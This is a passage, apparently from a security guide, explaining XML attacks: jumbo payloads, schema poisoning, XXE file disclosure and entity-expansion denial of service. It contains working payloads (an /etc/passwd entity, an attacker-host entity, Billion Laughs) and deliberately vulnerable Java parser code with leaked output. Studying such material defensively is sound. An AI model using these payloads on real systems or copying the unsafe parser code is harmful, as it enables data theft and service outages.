The previous schema includes a root element named &amp;lt;tt&amp;gt;operation&amp;lt;/tt&amp;gt;, which can contain an unlimited (&amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt;) amount of buy elements. This is a common finding, since developers do not normally want to restrict maximum numbers of ocurrences. Applications using limitless occurrences should test what happens when they receive an extremely large amount of elements to be processed. Since computational resources are limited, the consequences should be analyzed and eventually a maximum number ought to be used instead of an &amp;lt;tt&amp;gt;unbounded&amp;lt;/tt&amp;gt; value.&lt;br /&gt;
&lt;br /&gt;
== Jumbo Payloads ==&lt;br /&gt;
Sending an XML document of 1GB requires only a second of server processing and might not be worth consideration as an attack. Instead, an attacker would look for a way to minimize the CPU and traffic used to generate this type of attack, compared to the overall amount of server CPU or traffic used to handle the requests.&lt;br /&gt;
&lt;br /&gt;
=== Traditional Jumbo Payloads ===&lt;br /&gt;
There are two primary methods to make a document larger than normal:&lt;br /&gt;
* Depth attack: using a huge number of elements, element names, and/or element values.&lt;br /&gt;
* Width attack: using a huge number of attributes, attribute names, and/or attribute values.&lt;br /&gt;
In most cases, the overall result will be a huge document. This is a short example of what this looks like:&lt;br /&gt;
 &amp;lt;SOAPENV:ENVELOPE XMLNS:SOAPENV=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot; XMLNS:EXT=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://COM/IBM/WAS/WSSAMPLE/SEI/ECHO/B2B/EXTERNAL&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;SOAPENV:HEADER '''LARGENAME1'''=&amp;quot;'''LARGEVALUE'''&amp;quot; '''LARGENAME2'''=&amp;quot;'''LARGEVALUE2'''&amp;quot; '''LARGENAME3'''=&amp;quot;'''LARGEVALUE3'''&amp;quot; …&amp;gt;&lt;br /&gt;
  ...&lt;br /&gt;
&lt;br /&gt;
=== &amp;quot;Small&amp;quot; Jumbo Payloads ===&lt;br /&gt;
The following example is a very small document, but the results of processing this could be similar to those of processing traditional jumbo payloads. The purpose of such a small payload is that it allows an attacker to send many documents fast enough to make the application consume most or all of the available resources:&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ENTITY '''file''' SYSTEM &amp;quot;'''&amp;lt;nowiki&amp;gt;http://attacker/huge.xml&amp;lt;/nowiki&amp;gt;'''&amp;quot; &amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;file;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Schema Poisoning ==&lt;br /&gt;
When an attacker is capable of introducing modifications to a schema, there could be multiple high-risk consequences. In particular, the effect of these consequences will be more dangerous if the schemas are using DTD (e.g., file retrieval, denial of service). An attacker could exploit this type of vulnerability in numerous scenarios, always depending on the location of the schema. &lt;br /&gt;
&lt;br /&gt;
=== Local Schema Poisoning ===&lt;br /&gt;
Local schema poisoning happens when schemas are available in the same host, whether or not the schemas are embedded in the same XML document .&lt;br /&gt;
&lt;br /&gt;
==== Embedded Schema ====&lt;br /&gt;
The most trivial type of schema poisoning takes place when the schema is defined within the same XML document. Consider the following, unknowingly vulnerable example provided by the W3C :&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE note [&lt;br /&gt;
  &amp;lt;!ELEMENT note (to,from,heading,body)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT to (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT from (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT heading (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT body (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
All restrictions on the note element could be removed or altered, allowing the sending of any type of data to the server. Furthermore, if the server is processing external entities, the attacker could use the schema, for example, to read remote files from the server. This type of schema only serves as a suggestion for sending a document, but it must contains a way to check the embedded schema integrity to be used safely.&lt;br /&gt;
Attacks through embedded schemas are commonly used to exploit external entity expansions. Embedded XML schemas can also assist in port scans of internal hosts or brute force attacks.&lt;br /&gt;
&lt;br /&gt;
==== Incorrect Permissions ====&lt;br /&gt;
You can often circumvent the risk of using remotely tampered versions by processing a local schema. &lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''note.dtd'''&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
However, if the local schema does not contain the correct permissions, an internal attacker could alter the original restrictions. The following line exemplifies a schema using permissions that allow any user to make modifications:&lt;br /&gt;
 -rw-rw-'''rw-'''  1 user  staff  743 Jan 15 12:32 '''note.dtd'''&lt;br /&gt;
&lt;br /&gt;
The permissions set on &amp;lt;tt&amp;gt;name.dtd&amp;lt;/tt&amp;gt; allow any user on the system to make modifications. This vulnerability is clearly not related to the structure of an XML or a schema, but since these documents are commonly stored in the filesystem, it is worth mentioning that an attacker could exploit this type of problem.&lt;br /&gt;
&lt;br /&gt;
=== Remote Schema Poisoning ===&lt;br /&gt;
Schemas defined by external organizations are normally referenced remotely. If capable of diverting or accessing the network’s traffic, an attacker could cause a victim to fetch a distinct type of content rather than the one originally intended. &lt;br /&gt;
&lt;br /&gt;
==== Man-in-the-Middle (MitM) Attack ====&lt;br /&gt;
When documents reference remote schemas using the unencrypted Hypertext Transfer Protocol (HTTP), the communication is performed in plain text and an attacker could easily tamper with traffic. When XML documents reference remote schemas using an HTTP connection, the connection could be sniffed and modified before reaching the end user:&lt;br /&gt;
 &amp;lt;!DOCTYPE note SYSTEM &amp;quot;'''http'''://example.com/note.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;note&amp;gt;&lt;br /&gt;
  &amp;lt;to&amp;gt;Tove&amp;lt;/to&amp;gt;&lt;br /&gt;
  &amp;lt;from&amp;gt;Jani&amp;lt;/from&amp;gt;&lt;br /&gt;
  &amp;lt;heading&amp;gt;Reminder&amp;lt;/heading&amp;gt;&lt;br /&gt;
  &amp;lt;body&amp;gt;Don't forget me this weekend&amp;lt;/body&amp;gt;&lt;br /&gt;
 &amp;lt;/note&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The remote file &amp;lt;tt&amp;gt;note.dtd&amp;lt;/tt&amp;gt; could be susceptible to tampering when transmitted using the unencrypted HTTP protocol. One tool available to facilitate this type of attack is mitmproxy .&lt;br /&gt;
&lt;br /&gt;
==== DNS-Cache Poisoning ====&lt;br /&gt;
Remote schema poisoning may also be possible even when using encrypted protocols like Hypertext Transfer Protocol Secure (HTTPS). When software performs reverse Domain Name System (DNS) resolution on an IP address to obtain the hostname, it may not properly ensure that the IP address is truly associated with the hostname. In this case, the software enables an attacker to redirect content to their own Internet Protocol (IP) addresses .&lt;br /&gt;
The previous example referenced the host example.com using an unencrypted protocol. When switching to HTTPS, the location of the remote schema will look like  https://example/note.dtd. In a normal scenario, the IP of example.com resolves to 1.1.1.1:&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address 1.1.1.1&lt;br /&gt;
&lt;br /&gt;
If an attacker compromises the DNS being used, the previous hostname could now point to a new, different IP controlled by the attacker (2.2.2.2):&lt;br /&gt;
 $ host example.com&lt;br /&gt;
 example.com has address '''2.2.2.2'''&lt;br /&gt;
&lt;br /&gt;
When accessing the remote file, the victim may be actually retrieving the contents of a location controlled by an attacker.&lt;br /&gt;
&lt;br /&gt;
==== Evil Employee Attack ====&lt;br /&gt;
When third parties host and define schemas, the contents are not under the control of the schemas’ users. Any modifications introduced by a malicious employee—or an external attacker in control of these files—could impact all users processing the schemas. Subsequently, attackers could affect the confidentiality, integrity, or availability of other services (especially if the schema in use is DTD).  &lt;br /&gt;
&lt;br /&gt;
== XML Entity Expansion ==&lt;br /&gt;
If the parser uses a DTD, an attacker might inject data that may adversely affect the XML parser during document processing. These adverse effects could include the parser crashing or accessing local files.&lt;br /&gt;
&lt;br /&gt;
=== Sample Vulnerable Java Implementations === &lt;br /&gt;
Using the DTD capabilities of referencing local or remote files it is possible to affect the confidentiality. In addition, it is also possible to affect the availability of the resources if no proper restrictions have been set for the entities expansion. Consider the following example code of an XXE.&lt;br /&gt;
&lt;br /&gt;
'''Sample XML'''&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt; &lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''&amp;amp;xxe;'''&amp;lt;/lastname&amp;gt;&lt;br /&gt;
  &amp;lt;/contact&amp;gt; &lt;br /&gt;
 &amp;lt;/contacts&amp;gt;&lt;br /&gt;
&lt;br /&gt;
'''Sample DTD'''&lt;br /&gt;
 &amp;lt;!ELEMENT contacts (contact*)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT contact (firstname,lastname)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT firstname (#PCDATA)&amp;gt;&lt;br /&gt;
 &amp;lt;!ELEMENT lastname ANY&amp;gt;&lt;br /&gt;
 &amp;lt;!ENTITY xxe SYSTEM &amp;quot;'''/etc/passwd'''&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilder;&lt;br /&gt;
 import javax.xml.parsers.DocumentBuilderFactory;&lt;br /&gt;
 import javax.xml.parsers.ParserConfigurationException;&lt;br /&gt;
 import org.xml.sax.InputSource;&lt;br /&gt;
 import org.w3c.dom.Document;&lt;br /&gt;
 import org.w3c.dom.Element;&lt;br /&gt;
 import org.w3c.dom.Node;&lt;br /&gt;
 import org.w3c.dom.NodeList;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    DocumentBuilderFactory factory = DocumentBuilderFactory.newInstance();&lt;br /&gt;
    DocumentBuilder builder = factory.newDocumentBuilder();&lt;br /&gt;
    Document doc = builder.parse(new InputSource(&amp;quot;contacts.xml&amp;quot;));&lt;br /&gt;
    NodeList nodeLst = doc.getElementsByTagName(&amp;quot;contact&amp;quot;);&lt;br /&gt;
    for (int s = 0; s &amp;lt; nodeLst.getLength(); s++) {&lt;br /&gt;
      Node fstNode = nodeLst.item(s);&lt;br /&gt;
      if (fstNode.getNodeType() == Node.ELEMENT_NODE) {&lt;br /&gt;
        Element fstElmnt = (Element) fstNode;&lt;br /&gt;
        NodeList fstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;firstname&amp;quot;);&lt;br /&gt;
        Element fstNmElmnt = (Element) fstNmElmntLst.item(0);&lt;br /&gt;
        NodeList fstNm = fstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;First Name: &amp;quot;  + ((Node) fstNm.item(0)).getNodeValue());&lt;br /&gt;
        NodeList lstNmElmntLst = fstElmnt.getElementsByTagName(&amp;quot;lastname&amp;quot;);&lt;br /&gt;
        Element lstNmElmnt = (Element) lstNmElmntLst.item(0);&lt;br /&gt;
        NodeList lstNm = lstNmElmnt.getChildNodes();&lt;br /&gt;
        System.out.println(&amp;quot;Last Name: &amp;quot; + ((Node) lstNm.item(0)).getNodeValue());&lt;br /&gt;
      }&lt;br /&gt;
     }&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
     e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ javac parseDocument.java ; java parseDocument&lt;br /&gt;
 First Name: John&lt;br /&gt;
 Last Name: '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using DOM4J ====&lt;br /&gt;
 import org.dom4j.Document;&lt;br /&gt;
 import org.dom4j.DocumentException;&lt;br /&gt;
 import org.dom4j.io.SAXReader;&lt;br /&gt;
 import org.dom4j.io.OutputFormat;&lt;br /&gt;
 import org.dom4j.io.XMLWriter;&lt;br /&gt;
&lt;br /&gt;
 public class test1 {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   Document document = null;&lt;br /&gt;
   try {&lt;br /&gt;
    SAXReader reader = new SAXReader();&lt;br /&gt;
    document = reader.read(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   } &lt;br /&gt;
   OutputFormat format = OutputFormat.createPrettyPrint();&lt;br /&gt;
   try {&lt;br /&gt;
    XMLWriter writer = new XMLWriter( System.out, format );&lt;br /&gt;
    writer.write( document );&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java test1&lt;br /&gt;
 &amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;&lt;br /&gt;
&lt;br /&gt;
 &amp;lt;contacts&amp;gt;&lt;br /&gt;
  &amp;lt;contact&amp;gt;&lt;br /&gt;
   &amp;lt;firstname&amp;gt;John&amp;lt;/firstname&amp;gt;&lt;br /&gt;
   &amp;lt;lastname&amp;gt;'''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using SAX ====&lt;br /&gt;
 import java.io.IOException;&lt;br /&gt;
 import javax.xml.parsers.SAXParser;&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import org.xml.sax.SAXException;&lt;br /&gt;
 import org.xml.sax.helpers.DefaultHandler;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument extends DefaultHandler {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   new parseDocument();&lt;br /&gt;
  }&lt;br /&gt;
  public parseDocument() {&lt;br /&gt;
   try {&lt;br /&gt;
    SAXParserFactory factory = SAXParserFactory.newInstance();&lt;br /&gt;
    SAXParser parser = factory.newSAXParser();&lt;br /&gt;
    parser.parse(&amp;quot;contacts.xml&amp;quot;, this);&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
  @Override&lt;br /&gt;
  public void characters(char[] ac, int i, int j) throws SAXException {&lt;br /&gt;
   String tmpValue = new String(ac, i, j);&lt;br /&gt;
   System.out.println(tmpValue);&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 John&lt;br /&gt;
 '''### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
==== XXE using StAX ====&lt;br /&gt;
 import javax.xml.parsers.SAXParserFactory;&lt;br /&gt;
 import javax.xml.stream.XMLStreamReader;&lt;br /&gt;
 import javax.xml.stream.XMLInputFactory;&lt;br /&gt;
 import java.io.File;&lt;br /&gt;
 import java.io.FileReader;&lt;br /&gt;
 import java.io.FileInputStream;&lt;br /&gt;
&lt;br /&gt;
 public class parseDocument {&lt;br /&gt;
  public static void main(String[] args) {&lt;br /&gt;
   try {&lt;br /&gt;
    XMLInputFactory xmlif = XMLInputFactory.newInstance();&lt;br /&gt;
    FileReader fr = new FileReader(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    File file = new File(&amp;quot;contacts.xml&amp;quot;);&lt;br /&gt;
    XMLStreamReader xmlfer = xmlif.createXMLStreamReader(&amp;quot;contacts.xml&amp;quot;, new FileInputStream(file));&lt;br /&gt;
    int eventType = xmlfer.getEventType();&lt;br /&gt;
    while (xmlfer.hasNext()) {&lt;br /&gt;
     eventType = xmlfer.next(); &lt;br /&gt;
     if(xmlfer.hasText()){&lt;br /&gt;
      System.out.print(xmlfer.getText());&lt;br /&gt;
     }&lt;br /&gt;
    }&lt;br /&gt;
    fr.close();&lt;br /&gt;
   } catch (Exception e) {&lt;br /&gt;
    e.printStackTrace();&lt;br /&gt;
   }&lt;br /&gt;
  }&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
The previous code produces the following output:&lt;br /&gt;
 $ java parseDocument&lt;br /&gt;
 &amp;lt;!DOCTYPE contacts SYSTEM &amp;quot;contacts.dtd&amp;quot;&amp;gt;'''John### User Database'''&lt;br /&gt;
 '''...'''&lt;br /&gt;
 '''nobody:*:-2:-2:Unprivileged User:/var/empty:/usr/bin/false'''&lt;br /&gt;
 '''root:*:0:0:System Administrator:/var/root:/bin/sh'''&lt;br /&gt;
&lt;br /&gt;
=== Recursive Entity Reference ===&lt;br /&gt;
When the definition of an element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt; is another element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt;, and that element &amp;lt;tt&amp;gt;B&amp;lt;/tt&amp;gt; is defined as element &amp;lt;tt&amp;gt;A&amp;lt;/tt&amp;gt;, that schema describes a circular reference between elements:&lt;br /&gt;
 &amp;lt;!DOCTYPE A [&lt;br /&gt;
  &amp;lt;!ELEMENT A ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;&amp;lt;A&amp;gt;&amp;amp;B;&amp;lt;/A&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;!ENTITY B &amp;quot;&amp;amp;A;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;A&amp;gt;'''&amp;amp;A;'''&amp;lt;/A&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Quadratic Blowup ===&lt;br /&gt;
Instead of defining multiple small, deeply nested entities, the attacker in this scenario defines one very large entity and refers to it as many times as possible, resulting in a quadratic expansion (O(n2)). The result of the following attack will be 100,000*100,000 characters in memory.&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY A &amp;quot;AAAAA...(a 100.000 A's)...AAAAA&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;...(a 100.000 &amp;amp;A;'s)...&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;&amp;amp;A;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Billion Laughs ===&lt;br /&gt;
When an XML parser tries to resolve the external entities included within the following code, it will cause the application to start consuming all of the available memory until the process crashes. This is an example XML document with an embedded DTD schema including the attack:&lt;br /&gt;
 &amp;lt;!DOCTYPE root [&lt;br /&gt;
  &amp;lt;!ELEMENT root ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt; &lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;root&amp;gt;'''&amp;amp;LOL9;'''&amp;lt;/root&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The entity &amp;lt;tt&amp;gt;LOL9&amp;lt;/tt&amp;gt; will be resolved as the 10 entities defined in &amp;lt;tt&amp;gt;LOL8&amp;lt;/tt&amp;gt;; then each of these entities will be resolved in &amp;lt;tt&amp;gt;LOL7&amp;lt;/tt&amp;gt; and so on. Finally, the CPU and/or memory will be affected by parsing the 3*10^9 (3,000,000,000) entities defined in this schema, which could make the parser crash. &lt;br /&gt;
&lt;br /&gt;
The Simple Object Access Protocol (SOAP) specification forbids DTDs completely. This means that a SOAP processor can reject any SOAP message that contains a DTD. Despite this specification, certain SOAP implementations did parse DTD schemas within SOAP messages. The following example illustrates a case where the parser is not following the specification, enabling a reference to a DTD in a SOAP message :&lt;br /&gt;
 &amp;lt;?XML VERSION=&amp;quot;1.0&amp;quot; ENCODING=&amp;quot;UTF-8&amp;quot;?&amp;gt;&lt;br /&gt;
 &amp;lt;!DOCTYPE SOAP-ENV:ENVELOPE [ &lt;br /&gt;
  &amp;lt;!ELEMENT SOAP-ENV:ENVELOPE ANY&amp;gt;&lt;br /&gt;
  &amp;lt;!ATTLIST SOAP-ENV:ENVELOPE ENTITYREFERENCE CDATA #IMPLIED&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL &amp;quot;LOL&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL1 &amp;quot;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;amp;LOL;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL2 &amp;quot;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;amp;LOL1;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL3 &amp;quot;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;amp;LOL2;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL4 &amp;quot;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;amp;LOL3;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL5 &amp;quot;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;amp;LOL4;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL6 &amp;quot;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;amp;LOL5;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL7 &amp;quot;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;amp;LOL6;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL8 &amp;quot;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;amp;LOL7;&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;!ENTITY LOL9 &amp;quot;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;amp;LOL8;&amp;quot;&amp;gt;&lt;br /&gt;
 ]&amp;gt; &lt;br /&gt;
 &amp;lt;SOAP:ENVELOPE ENTITYREFERENCE=&amp;quot;'''&amp;amp;LOL9;'''&amp;quot; XMLNS:SOAP=&amp;quot;&amp;lt;nowiki&amp;gt;HTTP://SCHEMAS.XMLSOAP.ORG/SOAP/ENVELOPE/&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt; &lt;br /&gt;
  &amp;lt;SOAP:BODY&amp;gt; &lt;br /&gt;
   &amp;lt;KEYWORD XMLNS=&amp;quot;&amp;lt;nowiki&amp;gt;URN:PARASOFT:WS:STORE&amp;lt;/nowiki&amp;gt;&amp;quot;&amp;gt;FOO&amp;lt;/KEYWORD&amp;gt;&lt;br /&gt;
  &amp;lt;/SOAP:BODY&amp;gt;&lt;br /&gt;
 &amp;lt;/SOAP:ENVELOPE&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Reflected File Retrieval ===&lt;br /&gt;
